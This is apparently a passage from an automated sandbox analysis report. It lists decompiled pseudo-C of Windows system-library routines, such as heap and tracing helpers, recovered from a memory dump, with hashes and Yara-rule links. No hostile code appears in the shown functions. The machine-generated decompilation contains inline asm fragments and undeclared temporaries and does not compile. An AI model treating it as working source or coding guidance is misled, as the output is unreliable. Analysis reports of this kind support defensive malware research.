				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x349d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E033D9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E033EB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E03478A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E033D9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x349b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                          0x033c0055
                                          0x033c005d
                                          0x033c0062
                                          0x033c006c
                                          0x033c006f
                                          0x033c0074
                                          0x033c007a
                                          0x033c007a
                                          0x033c0080
                                          0x033c0080
                                          0x033c0087
                                          0x033c008d
                                          0x033c008f
                                          0x033c0093
                                          0x033c0095
                                          0x033c009b
                                          0x033c00f8
                                          0x033c00fb
                                          0x033c00fc
                                          0x033c00ff
                                          0x033c0108
                                          0x033c0108
                                          0x033c00a2
                                          0x033c00a6
                                          0x033c00b3
                                          0x033c00bc
                                          0x033c00c5
                                          0x033c00ca
                                          0x0340c01e
                                          0x00000000
                                          0x00000000
                                          0x0340c02d
                                          0x033c00d5
                                          0x033c00d9
                                          0x0340c03d
                                          0x0340c046
                                          0x0340c046
                                          0x033c00df
                                          0x033c00e2
                                          0x033c00ea
                                          0x033c00ef
                                          0x033c00f2
                                          0x033c00f6
                                          0x033c0111
                                          0x033c0117
                                          0x033c0117
                                          0x00000000
                                          0x033c00f6
                                          0x033c00d0
                                          0x033c00d0
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 985f9c020dc598f1fe63f7e5447641cac9a4b052a62506ebe624291c93f8a612
                                          • Instruction ID: ee6e576e82d6508d8e23803684f0d80baa3c953b3f7dfb41bb22b36566f94ed2
                                          • Opcode Fuzzy Hash: 985f9c020dc598f1fe63f7e5447641cac9a4b052a62506ebe624291c93f8a612
                                          • Instruction Fuzzy Hash: CE319A31611B84CFD725CB28C984B96B3E5FB88714F19456DE4AA8BA90EB35EC01CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03426C0A, Relevance: .1, Instructions: 79COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E03426C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E033C7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x3497b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L033C4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E033EF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E033C7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E033E9AE0();
						_t23 = L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                          0x03426c0a
                                          0x03426c0f
                                          0x03426c10
                                          0x03426c13
                                          0x03426c15
                                          0x03426c19
                                          0x03426c1c
                                          0x03426c21
                                          0x03426c28
                                          0x03426c3a
                                          0x03426c2a
                                          0x03426c33
                                          0x03426c33
                                          0x03426c3f
                                          0x03426c48
                                          0x03426c4d
                                          0x03426c60
                                          0x03426c65
                                          0x03426c69
                                          0x03426c73
                                          0x03426c79
                                          0x03426c7f
                                          0x03426c86
                                          0x03426c90
                                          0x03426c94
                                          0x03426ca6
                                          0x03426cb2
                                          0x03426cbd
                                          0x03426cbd
                                          0x03426cc3
                                          0x03426cc7
                                          0x03426ccb
                                          0x03426cd0
                                          0x03426cd1
                                          0x03426ce2
                                          0x03426ce2
                                          0x03426c69
                                          0x03426ced

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: efd9aaeca0f6ea59cddc02adb0bd8102c8b2858f19a3b1667532a41a2b7ad7ef
                                          • Instruction ID: d4e22e4ccd8eee89097f5cb6077308aedf9f2b08302343c03a4abdda762e14a7
                                          • Opcode Fuzzy Hash: efd9aaeca0f6ea59cddc02adb0bd8102c8b2858f19a3b1667532a41a2b7ad7ef
                                          • Instruction Fuzzy Hash: DE21BCB5A00654AFC711EF69D880F2AB7B8FF48744F04006AF905DB791D638ED50CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E90AF, Relevance: .1, Instructions: 76COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E033E90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E033FD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E033DE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L033C4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E033EF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E033DA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                          0x033e90af
                                          0x033e90b8
                                          0x033e90bb
                                          0x033e90bf
                                          0x033e90c2
                                          0x033e90c2
                                          0x033e90c8
                                          0x033e90cb
                                          0x033e90cd
                                          0x034214d7
                                          0x034214eb
                                          0x034214eb
                                          0x00000000
                                          0x034214eb
                                          0x034214db
                                          0x034214e6
                                          0x00000000
                                          0x034214f2
                                          0x034214e8
                                          0x00000000
                                          0x034214e8
                                          0x033e90d8
                                          0x033e90da
                                          0x033e90dd
                                          0x033e90e5
                                          0x00000000
                                          0x033e9139
                                          0x033e90fa
                                          0x033e90fe
                                          0x033e9142
                                          0x00000000
                                          0x033e9142
                                          0x033e9104
                                          0x033e9107
                                          0x033e910b
                                          0x033e9110
                                          0x033e9118
                                          0x033e9147
                                          0x033e9148
                                          0x033e914f
                                          0x033e9150
                                          0x033e9151
                                          0x033e9152
                                          0x033e9156
                                          0x033e915d
                                          0x033e9160
                                          0x033e9168
                                          0x033e916c
                                          0x033e91bc
                                          0x033e91be
                                          0x00000000
                                          0x033e91be
                                          0x033e916e
                                          0x033e9173
                                          0x033e9176
                                          0x00000000
                                          0x00000000
                                          0x033e917c
                                          0x033e9180
                                          0x033e91b5
                                          0x00000000
                                          0x033e91b5
                                          0x033e9182
                                          0x033e9185
                                          0x033e9189
                                          0x00000000
                                          0x00000000
                                          0x033e918e
                                          0x033e9190
                                          0x033e9198
                                          0x00000000
                                          0x00000000
                                          0x033e91a0
                                          0x00000000
                                          0x033e91ad
                                          0x033e91ad
                                          0x033e91b0
                                          0x033e91b1
                                          0x00000000
                                          0x033e9185
                                          0x033e911a
                                          0x033e911c
                                          0x033e911f
                                          0x033e9125
                                          0x033e9127
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                          • Instruction ID: 9dffce9bc32eab575c22d9df49c994ea5e4e74d490765a135b0c8e80e9307006
                                          • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                          • Instruction Fuzzy Hash: 682180B5A00314EFDB20DF59C884B6AFBF8EB48350F15886AE949AB240D374ED40CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033D3B7A, Relevance: .1, Instructions: 75COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E033D3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x34984c4; // 0x0
				_v12 = 1;
				_v8 =  *0x34984c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L033C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x34984c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E033EAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E033EFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x34984c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x34984c4; // 0x0
					L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                          0x033d3b89
                                          0x033d3b96
                                          0x033d3ba1
                                          0x033d3bab
                                          0x033d3bb5
                                          0x033d3bb9
                                          0x03416298
                                          0x033d3bbf
                                          0x033d3bc2
                                          0x033d3bc3
                                          0x033d3bc9
                                          0x033d3bca
                                          0x033d3bcc
                                          0x033d3bcd
                                          0x033d3bd4
                                          0x033d3bd6
                                          0x033d3bdb
                                          0x033d3bea
                                          0x033d3bf7
                                          0x033d3bfb
                                          0x033d3bff
                                          0x033d3c09
                                          0x033d3c0a
                                          0x033d3c0b
                                          0x033d3c0f
                                          0x033d3c14
                                          0x033d3c18
                                          0x033d3c18
                                          0x033d3bfb
                                          0x033d3c1b
                                          0x033d3c30
                                          0x033d3c30
                                          0x033d3c3d

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c47b51de2f31d64f3c218c765e6fc1ac8a1147d3df42b8590a2542dc75bbbe5a
                                          • Instruction ID: 0a2a61189f45ba1768b31bec3397d135dc9971ddb99d802ee1781aa9e65b9c4a
                                          • Opcode Fuzzy Hash: c47b51de2f31d64f3c218c765e6fc1ac8a1147d3df42b8590a2542dc75bbbe5a
                                          • Instruction Fuzzy Hash: 8B218E76A00218EFC700DF98DDC1BAAB7BDFB44618F150169E908AB251D371ED158B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03426CF0, Relevance: .1, Instructions: 74COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E03426CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E033C7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E033C7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x3385c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E033DF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E033DF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E03427016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L033C2400( &_v52);
								}
								_t21 = L033C2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                          0x03426cfb
                                          0x03426d00
                                          0x03426d02
                                          0x03426d06
                                          0x03426d0a
                                          0x03426d0e
                                          0x03426d19
                                          0x03426d2b
                                          0x03426d1b
                                          0x03426d24
                                          0x03426d24
                                          0x03426d33
                                          0x03426d39
                                          0x03426d46
                                          0x03426d4f
                                          0x03426d61
                                          0x03426d51
                                          0x03426d5a
                                          0x03426d5a
                                          0x03426d69
                                          0x03426d6b
                                          0x03426d6d
                                          0x03426d6f
                                          0x03426d6f
                                          0x03426d74
                                          0x03426d79
                                          0x03426d7a
                                          0x03426d7f
                                          0x03426d82
                                          0x03426d88
                                          0x03426d89
                                          0x03426d90
                                          0x03426d94
                                          0x03426da7
                                          0x03426db1
                                          0x03426db1
                                          0x03426dbb
                                          0x03426dbb
                                          0x03426d90
                                          0x03426d69
                                          0x03426d46
                                          0x03426dc6

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d918771117a3f750dd213c16eefdc78fff1d7d8659581a277ee84dace721b8c6
                                          • Instruction ID: dcf07741ff92ac3e139aa5c58831dd4c338befbf1e0adcc1084ff838aa8321ce
                                          • Opcode Fuzzy Hash: d918771117a3f750dd213c16eefdc78fff1d7d8659581a277ee84dace721b8c6
                                          • Instruction Fuzzy Hash: 4F21D3729103989FC711EF29C984B67BBECAF81640F49045BB940EF251DB78D909C7A6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0347070D, Relevance: .1, Instructions: 72COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E0347070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E034707DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0346AFDE( &_v8,  &_v12);
					E03471293(_t38, _v28, _t60);
					if(E033C7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E034614FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                          0x0347071b
                                          0x03470724
                                          0x03470734
                                          0x03470738
                                          0x0347074b
                                          0x0347074b
                                          0x03470753
                                          0x03470753
                                          0x03470759
                                          0x0347075d
                                          0x03470774
                                          0x03470779
                                          0x0347077d
                                          0x03470789
                                          0x03470795
                                          0x034707a7
                                          0x03470797
                                          0x034707a0
                                          0x034707a0
                                          0x034707af
                                          0x034707c4
                                          0x034707cd
                                          0x034707cd
                                          0x034707af
                                          0x034707dc

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                          • Instruction ID: e9cf1ee120707c5b35e485f12967386993476c5a065334418dbbd22556c5aa54
                                          • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                          • Instruction Fuzzy Hash: 4921F27A2042009FD715DF18C884AAABBA5EFC4350F08856EF9959F385D630D909CB96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03472EF7, Relevance: .1, Instructions: 72COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 35%
                                          			E03472EF7(void* __ecx, signed int __edx, void* _a8, signed int _a12) {
				char _v5;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v32;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				void* _t71;
				signed int _t94;
				signed int _t105;
				signed int _t106;
				void* _t107;
				signed int _t114;
				signed int _t115;
				signed int _t141;
				signed int _t142;
				signed char _t145;
				signed char _t146;
				void* _t154;
				signed int _t155;
				void* _t156;
				signed int _t160;
				signed int _t164;
				void* _t165;
				signed int _t172;
				signed int _t174;

				_push(__ecx);
				_push(__ecx);
				_t105 = __edx;
				_t154 = __ecx;
				_t160 =  *__edx ^ __edx;
				_t141 =  *(__edx + 4) ^ __edx;
				if(( *(_t160 + 4) ^ _t160) != __edx || ( *_t141 ^ _t141) != __edx) {
					_t114 = 3;
					asm("int 0x29");
					_t174 = (_t172 & 0xfffffff8) - 0x24;
					_t62 =  *0x349d360 ^ _t174;
					_v32 = _t62;
					_push(_t105);
					_push(_t160);
					_t106 = _t114;
					_t115 = _v20;
					_push(_t154);
					_t155 = _t141;
					_t142 = _v16;
					__eflags = _t115;
					if(__eflags != 0) {
						asm("bsf esi, ecx");
					} else {
						asm("bsf esi, edx");
						_t62 = (_t62 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff;
						__eflags = _t62;
						if(_t62 == 0) {
							_t160 = _v44;
						} else {
							_t160 = _t160 + 0x20;
						}
					}
					__eflags = _t142;
					if(__eflags == 0) {
						asm("bsr eax, ecx");
					} else {
						asm("bsr ecx, edx");
						if(__eflags == 0) {
							_t62 = _v44;
						} else {
							_t27 = _t115 + 0x20; // 0x20
							_t62 = _t27;
						}
					}
					_v56 = (_t160 << 0xc) + _t155;
					_v60 = _t62 - _t160 + 1 << 0xc;
					_t71 = E033ED0F0(1, _t62 - _t160 + 1, 0);
					asm("adc edx, 0xffffffff");
					_v52 = E033ED0F0(_t71 + 0xffffffff, _t160, 0);
					_v48 = 0;
					_v44 = _t155 + 0x10;
					E033C2280(_t155 + 0x10, _t155 + 0x10);
					__eflags = _a12;
					_push(_v64);
					_push(_v60);
					_push( *((intOrPtr*)(_t106 + 0x20)));
					if(_a12 == 0) {
						 *0x349b1e0();
						 *( *(_t106 + 0x30) ^  *0x3496110 ^ _t106)();
						 *(_t155 + 0xc) =  *(_t155 + 0xc) &  !_v60;
						_t54 = _t155 + 8;
						 *_t54 =  *(_t155 + 8) &  !_v64;
						__eflags =  *_t54;
						goto L18;
					} else {
						 *0x349b1e0();
						_t164 =  *( *(_t106 + 0x2c) ^  *0x3496110 ^ _t106)();
						__eflags = _t164;
						if(_t164 >= 0) {
							 *(_t155 + 8) =  *(_t155 + 8) | _v64;
							 *(_t155 + 0xc) =  *(_t155 + 0xc) | _v60;
							L18:
							asm("lock xadd [eax], ecx");
							_t164 = 0;
							__eflags = 0;
						}
					}
					E033BFFB0(_t106, _t155, _v56);
					_pop(_t156);
					_pop(_t165);
					_pop(_t107);
					__eflags = _v48 ^ _t174;
					return E033EB640(_t164, _t107, _v48 ^ _t174, 0, _t156, _t165);
				} else {
					_t94 = _t141 ^ _t160;
					 *_t141 = _t94;
					 *(_t160 + 4) = _t94;
					_t145 =  !( *(__edx + 8));
					_t146 = _t145 >> 8;
					_v12 = _t146 >> 8;
					_v5 =  *((intOrPtr*)((_t145 & 0x000000ff) + 0x338ac00)) +  *((intOrPtr*)((_t146 & 0x000000ff) + 0x338ac00));
					asm("lock xadd [eax], edx");
					return __ecx + 0x18;
				}
			}






































                                          0x03472efc
                                          0x03472efd
                                          0x03472eff
                                          0x03472f03
                                          0x03472f0a
                                          0x03472f0c
                                          0x03472f15
                                          0x03472fba
                                          0x03472fbb
                                          0x03472fc5
                                          0x03472fcd
                                          0x03472fcf
                                          0x03472fd3
                                          0x03472fd4
                                          0x03472fd5
                                          0x03472fd7
                                          0x03472fda
                                          0x03472fdb
                                          0x03472fdd
                                          0x03472fe0
                                          0x03472fe2
                                          0x03472ffc
                                          0x03472fe4
                                          0x03472fe4
                                          0x03472fea
                                          0x03472fed
                                          0x03472fef
                                          0x03472ff6
                                          0x03472ff1
                                          0x03472ff1
                                          0x03472ff1
                                          0x03472fef
                                          0x03472fff
                                          0x03473001
                                          0x0347301b
                                          0x03473003
                                          0x03473003
                                          0x0347300e
                                          0x03473015
                                          0x03473010
                                          0x03473010
                                          0x03473010
                                          0x03473010
                                          0x0347300e
                                          0x0347302c
                                          0x03473035
                                          0x0347303c
                                          0x03473046
                                          0x0347304e
                                          0x03473056
                                          0x0347305a
                                          0x0347305e
                                          0x03473063
                                          0x03473067
                                          0x0347306b
                                          0x0347306f
                                          0x03473072
                                          0x034730af
                                          0x034730b5
                                          0x034730c1
                                          0x034730c9
                                          0x034730c9
                                          0x034730c9
                                          0x00000000
                                          0x03473074
                                          0x03473081
                                          0x03473089
                                          0x0347308b
                                          0x0347308d
                                          0x03473093
                                          0x0347309a
                                          0x034730ce
                                          0x034730d1
                                          0x034730d5
                                          0x034730d5
                                          0x034730d5
                                          0x0347308d
                                          0x034730db
                                          0x034730e6
                                          0x034730e7
                                          0x034730e8
                                          0x034730e9
                                          0x034730f3
                                          0x03472f27
                                          0x03472f29
                                          0x03472f2b
                                          0x03472f2d
                                          0x03472f36
                                          0x03472f3d
                                          0x03472f4c
                                          0x03472f58
                                          0x03472fad
                                          0x03472fb7
                                          0x03472fb7

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d71093c82f3e56dc905c21ca50a72ac332570af8e5d30cfaf965b41faed1bf98
                                          • Instruction ID: b03b76d19710e67249d70c1f3da7df34cfa7a4be87fa07340383db3b27a1b75e
                                          • Opcode Fuzzy Hash: d71093c82f3e56dc905c21ca50a72ac332570af8e5d30cfaf965b41faed1bf98
                                          • Instruction Fuzzy Hash: E421A8612042500BD745CB1ECCF05B6BFF5EFC611275A82E6E988CB782C9289417D7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03471FF1, Relevance: .1, Instructions: 70COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E03471FF1(void* __ecx, intOrPtr __edx, signed int _a4) {
				intOrPtr _v8;
				signed int _t22;
				signed int _t34;
				signed int _t38;
				signed int _t41;
				signed int _t42;
				signed int _t44;
				signed int _t54;
				signed int _t55;

				_t44 = _a4;
				_v8 = __edx;
				_t3 = _t44 + 0x1007; // 0x1007
				_t41 = _t3 & 0xfffff000;
				_t54 = ( *_t44 ^  *0x3496110 ^ _t44) >> 0x00000001 & 0x00007fff;
				if(_t41 - _t44 < _t54 << 3) {
					_t42 = _t41 + 0xfffffff0;
					_t34 = _t42 - _t44 >> 3;
					_t55 = _t54 - _t34;
					 *_t44 =  *_t44 ^ (_t34 + _t34 ^  *_t44 ^  *0x3496110 ^ _t44) & 0x0000fffe;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t22 = ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff) + ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff);
					 *_t42 = _t22;
					_t38 = _t42 + _t55 * 8;
					 *_t42 = _t22 ^  *0x3496110 ^ _t42;
					if(_t38 < _v8 + (( *(_v8 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t38 =  *_t38 ^ (_t55 << 0x00000010 ^  *0x3496110 ^ _t38 ^  *_t38) & 0x7fff0000;
					}
				} else {
					_t42 = 0;
				}
				return _t42;
			}












                                          0x03471ff9
                                          0x03471ffc
                                          0x03472001
                                          0x0347200d
                                          0x0347201b
                                          0x03472028
                                          0x0347202e
                                          0x03472035
                                          0x03472038
                                          0x0347204c
                                          0x03472052
                                          0x03472053
                                          0x03472054
                                          0x03472055
                                          0x03472069
                                          0x0347206c
                                          0x0347206e
                                          0x03472079
                                          0x03472087
                                          0x0347209c
                                          0x0347209c
                                          0x0347202a
                                          0x0347202a
                                          0x0347202a
